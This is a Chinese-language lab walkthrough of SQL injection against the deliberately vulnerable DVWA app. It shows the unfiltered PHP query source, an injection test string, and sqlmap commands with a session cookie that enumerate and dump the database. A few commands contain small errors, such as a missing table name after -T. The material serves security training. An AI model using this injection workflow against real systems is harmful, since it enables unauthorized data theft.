一、 环境说明
靶机: 192.168.1.201 (DVWA 容器)
攻击: 192.168.1.15 (kali)
Security: Low
二、 SQL Injection
2.1 源码分析
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
$id = $_REQUEST[ 'id' ];
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
while( $row = mysqli_fetch_assoc( $result ) ) {
$first = $row["first_name"];
$last = $row["last_name"];
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
|
输入用户id, 参数传入之后没有任何过滤, 拼接成sql语句使用mysqli-query函数查询
测试 ' and 1=2, 根据 response 判断存在 字符串类型注入
2.2 获取 cookie
这里使用Burp Suite
2.3 使用sqlmap对url进行检测
sudo sqlmap -u "http://192.168.1.201/vulnerabilities/sqli/?id=1&Submit=Submit#" \
--cookie="PHPSESSID=e1vntltnfvu24qhi81a5rmuhm1; security=low"
|
存在以下可以注入的类型:
UNION query SQL injection(可联合查询注入)
Boolean-based blind SQL injection(布尔型注入)
Error-based SQL injection(报错型注入)
Time-based blind SQL injection(基于时间延迟注入)
枚举出 DBMS 所有数据库
sudo sqlmap -u "http://192.168.1.201/vulnerabilities/sqli/?id=1&Submit=Submit#" \
--cookie="PHPSESSID=e1vntltnfvu24qhi81a5rmuhm1; security=low" \
-- dbs
|
枚举出 DBMS 数据库中的所有表
sudo sqlmap -u "http://192.168.1.201/vulnerabilities/sqli/?id=1&Submit=Submit#" \
--cookie="PHPSESSID=e1vntltnfvu24qhi81a5rmuhm1; security=low" \
-D dvwa --tables
|
枚举出 DBMS 表中的所有列
sudo sqlmap -u "http://192.168.1.201/vulnerabilities/sqli/?id=1&Submit=Submit#" \
--cookie="PHPSESSID=e1vntltnfvu24qhi81a5rmuhm1; security=low" \
-D dvwa -T --columns
|
枚举所有数据
sudo sqlmap -u "http://192.168.1.201/vulnerabilities/sqli/?id=1&Submit=Submit#" \
--cookie="PHPSESSID=e1vntltnfvu24qhi81a5rmuhm1; security=low" \
-D dvwa -T --columns -a
|
